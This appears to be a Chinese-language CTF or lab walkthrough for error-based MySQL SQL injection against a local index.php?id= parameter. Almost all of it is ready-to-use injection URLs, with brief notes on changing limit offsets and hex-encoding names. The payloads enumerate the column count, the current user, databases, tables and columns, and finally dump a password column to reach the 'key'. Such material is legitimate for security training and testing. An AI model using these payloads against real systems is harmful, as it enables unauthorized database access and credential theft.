http://127.0.0.1/index.php?id=1
http://127.0.0.1/index.php?id=1'
查看字段情況:
http://127.0.0.1/index.php?id=1' order by 3%23http://127.0.0.1/index.php?id=1' order by 4%23
報錯注入語句格式:
http://127.0.0.1/index.php?id=1' and 1=2 union select1,2,3 from(select+count(*),concat(floor(rand(0)*2),(SQL語句))a from information_schema.tables group by a)b%23注:
其中1,2,3爲存在的字段數
SQL語句處爲要輸入的SQL注入語句
查看當前數據庫賬號的權限:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from(select+count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b%23
爆庫名:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from (select+count(*),concat(floor(rand(0)*2),(select schema_name from information_schema.schemata limit 5,1
))a from information_schema.tables group by a)b%23
注:
limit x,1 中x表示要查詢的第x個數據庫名,從0開始算起
爆表名:
http://127.0.0.1/index.php?id=1' and 1=2 unionselect 1,2,3 from (select+count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit0,1
))a from information_schema.tables group by a)b%23
注:
database() 表示使用當前數據庫,如果要跨庫查詢,將庫名十六進制編碼後填入其中,如:table_schema=0x111111111;
limit 0,1 表示查詢第一個表名,修改0查詢其他;
爆字段:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from (select+count(*),concat(floor(rand(0)*2),(select column_name from information_schema.columns where table_schema=database() and table_name=0x11111111limit 2,1
))a from information_schema.tables group by a)b%23
注:
0x11111111 爲要查詢的表名的十六進制
limit 2,1 爲要查詢的第2個字段
爆pwd:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from(select+count(*),concat(floor(rand(0)*2),(select pwd from user
))a from information_schema.tables group by a)b%23
拿到最終的key